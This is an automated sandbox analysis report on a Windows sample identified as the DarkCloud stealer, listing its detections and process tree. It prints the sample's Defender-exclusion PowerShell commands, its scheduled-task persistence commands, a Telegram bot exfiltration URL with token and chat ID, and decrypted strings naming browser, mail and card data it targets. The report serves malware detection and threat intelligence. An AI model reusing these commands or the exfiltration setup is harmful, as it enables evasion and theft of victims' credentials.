Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DESCRIPTION.exe

Overview

General Information

Sample name:DESCRIPTION.exe
Analysis ID:1591788
MD5:93671481ec5215bb84afde48ad2280f1
SHA1:1a4f8481cada880a1122d83707b3f9ea819f1139
SHA256:00580380c811027c799634812e6f785df11f2f2eb3fa1718ac8c4ff47fd6ef2d
Tags:exeuser-TeamDreier
Infos:

Detection

DarkCloud
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected DarkCloud
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DESCRIPTION.exe (PID: 180 cmdline: "C:\Users\user\Desktop\DESCRIPTION.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)
    • powershell.exe (PID: 2108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4032 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DESCRIPTION.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\DESCRIPTION.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)
  • OdoiXyuXnaQN.exe (PID: 5480 cmdline: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe MD5: 93671481EC5215BB84AFDE48AD2280F1)
    • schtasks.exe (PID: 5840 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • OdoiXyuXnaQN.exe (PID: 7124 cmdline: "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)
    • OdoiXyuXnaQN.exe (PID: 4824 cmdline: "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)
    • OdoiXyuXnaQN.exe (PID: 5348 cmdline: "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)
      • WmiPrvSE.exe (PID: 4428 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkCloud StealerStealer is written in Visual Basic.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: DarkCloud

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    Process Memory Space: DESCRIPTION.exe PID: 180JoeSecurity_DarkCloudYara detected DarkCloudJoe Security
      Process Memory Space: DESCRIPTION.exe PID: 180JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: OdoiXyuXnaQN.exe PID: 5480JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: OdoiXyuXnaQN.exe PID: 5348JoeSecurity_DarkCloudYara detected DarkCloudJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.DESCRIPTION.exe.3dfe800.0.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
              1.2.DESCRIPTION.exe.3fe4798.1.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                1.2.DESCRIPTION.exe.3db4ec0.2.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                  1.2.DESCRIPTION.exe.3fe4798.1.raw.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                    1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", ProcessId: 2108, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", ProcessId: 2108, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe, ParentImage: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe, ParentProcessId: 5480, ParentProcessName: OdoiXyuXnaQN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp", ProcessId: 5840, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", ProcessId: 4032, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", ProcessId: 2108, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", ProcessId: 4032, ProcessName: schtasks.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpackMalware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeReversingLabs: Detection: 34%
                      Multi AV Scanner detection for submitted file
                      Source: DESCRIPTION.exeVirustotal: Detection: 33%Perma Link
                      Source: DESCRIPTION.exeReversingLabs: Detection: 31%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: DESCRIPTION.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Cookies
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \Default\Login Data
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \Login Data
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: //setting[@name='Password']/value
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Password :
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: SMTP Email Address
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: NNTP Email Address
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Email
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: HTTPMail User Name
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: HTTPMail Server
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Password
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^3[47][0-9]{13}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(6541|6556)[0-9]{12}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^389[0-9]{11}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^63[7-9][0-9]{13}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: mail\
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^9[0-9]{15}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Mastercard
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(62[0-9]{14,17})$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Visa Card
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Visa Master Card
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \logins.json
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \signons.sqlite
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Foxmail.exe
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \Accounts\Account.rec0
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \AccCfg\Accounts.tdat
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: EnableSignature
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Application : FoxMail
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: encryptedUsername
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: logins
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: encryptedPassword
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: Select * from Win32_ComputerSystem
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \cookies.db
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \Default\Cookies
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \Cookies
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \cookies.sqlite
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: \global-messages-db.sqlite
                      Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpackString decryptor: C:\\MailMasterData
                      Source: DESCRIPTION.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: DESCRIPTION.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: W.pdb4 source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: joip.pdbSHA256 source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.dr
                      Source: Binary string: joip.pdb source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.dr
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 162.55.60.2 162.55.60.2
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeCode function: 9_2_00438C80 InternetOpenA,InternetOpenUrlA,InternetReadFile,9_2_00438C80
                      Source: DESCRIPTION.exe, 00000001.00000002.1500033277.00000000024B9000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 0000000A.00000002.1557268789.0000000002AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/
                      Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/#z
                      Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/)z
                      Source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719577553.0000000004207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                      Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/B
                      Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/S
                      Source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMP
                      Source: OdoiXyuXnaQN.exe, 00000010.00000002.2720680009.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732
                      Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/mplates
                      Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/t
                      Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719577553.0000000004207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com_P

                      System Summary

                      barindex
                      Writes or reads registry keys via WMI
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
